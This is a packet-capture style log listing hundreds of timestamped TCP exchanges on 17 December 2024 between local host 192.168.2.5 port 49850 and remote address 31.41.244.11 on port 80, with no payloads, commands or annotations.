Dec 17, 2024 06:03:20.698283911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.698323011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.699352980 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.699400902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.699414015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.699462891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.700400114 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.700445890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.700509071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.700548887 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.701539040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.701581001 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.701685905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.701725960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.702655077 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.702697992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.702770948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.702814102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.703743935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.703807116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.703850031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.703891993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.704854965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.704898119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.704971075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.705013037 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.705965996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.706028938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.706044912 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.706089973 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.707091093 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.707134008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.707190990 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.707232952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.708187103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.708229065 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.708297968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.708338976 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.709363937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.709410906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.709453106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.709497929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.710422039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.710469007 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.710527897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.710568905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.711607933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.711657047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.711687088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.711733103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.712657928 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.712704897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.712770939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.712812901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.713762999 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.713804960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.713871002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.713912010 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.714890957 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.714941025 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.715002060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.715045929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.715993881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.716089964 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.716114044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.716152906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.717045069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.717099905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.850967884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.851053953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.851185083 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.851228952 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.851428986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.851509094 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.851598024 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.851643085 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.852930069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.852946043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.852981091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.853005886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.853666067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.853712082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.853756905 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.853804111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.855178118 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.855194092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.855225086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.855235100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.856055975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.856070995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.856106997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.856126070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.856970072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.857026100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.857081890 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.857115984 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.858371019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.858386040 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.858417034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.858434916 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.859384060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.859400034 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.859430075 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.859441042 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.860511065 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.860527039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.860553026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.860565901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.861483097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.861527920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.861541986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.861582041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.862591028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.862648010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.862657070 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.862690926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.863775969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.863791943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.863816023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.863828897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.864811897 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.864854097 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.864871979 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.864908934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.865885019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.865935087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.865995884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.866039038 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.867065907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.867110968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.867114067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.867157936 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.868114948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.868160009 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.868200064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.868269920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.869229078 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.869272947 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.869378090 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.869421005 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.870342016 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.870366096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.870392084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.870402098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.871552944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.871567965 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.871599913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.872560978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.872617006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.872700930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.872745991 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.873720884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.873734951 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.873768091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.873779058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.874799013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.874840975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.874898911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.874943972 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.875956059 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.876002073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.876014948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.876053095 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.877127886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.877173901 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.877212048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.877255917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.878148079 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.878189087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.878232002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.878268957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.879218102 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.879262924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.879375935 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.879417896 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.880367994 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.880413055 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.880455017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.880530119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.882175922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.882191896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.882246971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.882293940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.883286953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.883301020 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.883337975 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.883347988 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.883737087 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.883781910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.883817911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.883860111 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.884834051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.884879112 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.884902954 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.884943962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.885895014 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.885941029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.886020899 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.886068106 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.887108088 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.887123108 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.887155056 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.887172937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.888241053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.888293982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.888293982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.888334990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.889678001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.889693975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.889720917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.889739990 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.890372038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.890415907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.890433073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.890471935 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.891479015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.891525030 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.891613960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.891654015 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.892894983 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.892930984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.892957926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.892973900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.893829107 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.893842936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.893874884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.893902063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.894870043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.894886017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.894912004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.894926071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.896065950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.896081924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.896133900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.896145105 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.897051096 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.897094011 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.897264004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.897304058 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.898206949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.898251057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.898441076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.898480892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.899338961 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.899382114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.899403095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.899441004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.900383949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.900424957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.900502920 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.900541067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.901472092 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.901514053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.901593924 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.901632071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.902687073 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.902733088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.902761936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.902806997 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.903743029 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.903780937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.903824091 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.903866053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.904930115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.904969931 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.904983044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.905019999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.906007051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.906038046 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.906049967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.906076908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.907032967 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.907073021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.907180071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.907221079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.908193111 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.908260107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.908509970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.908556938 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:20.909246922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:20.909296036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.043189049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.043293953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.043318987 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.043381929 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.043595076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.043648958 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.043828964 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.043934107 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.044666052 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.044712067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.044874907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.044920921 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.045774937 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.045819044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.046004057 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.046047926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.046865940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.046910048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.047023058 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.047065020 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.048202038 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.048218012 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.048243046 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.048259974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.049282074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.049298048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.049324989 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.049335003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.050257921 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.050306082 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.050766945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.050812960 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.051362991 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.051413059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.051446915 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.051490068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.052514076 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.052558899 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.052566051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.052607059 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.053654909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.053699017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.053714037 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.053755999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.054732084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.054778099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.054893017 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.054936886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.055775881 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.055913925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.055948019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.055998087 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.056879044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.056936026 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.057004929 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.057146072 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.057991028 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:21.058038950 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:21.058134079 CET	80	49850	31.41.244.11	192.168.2.5
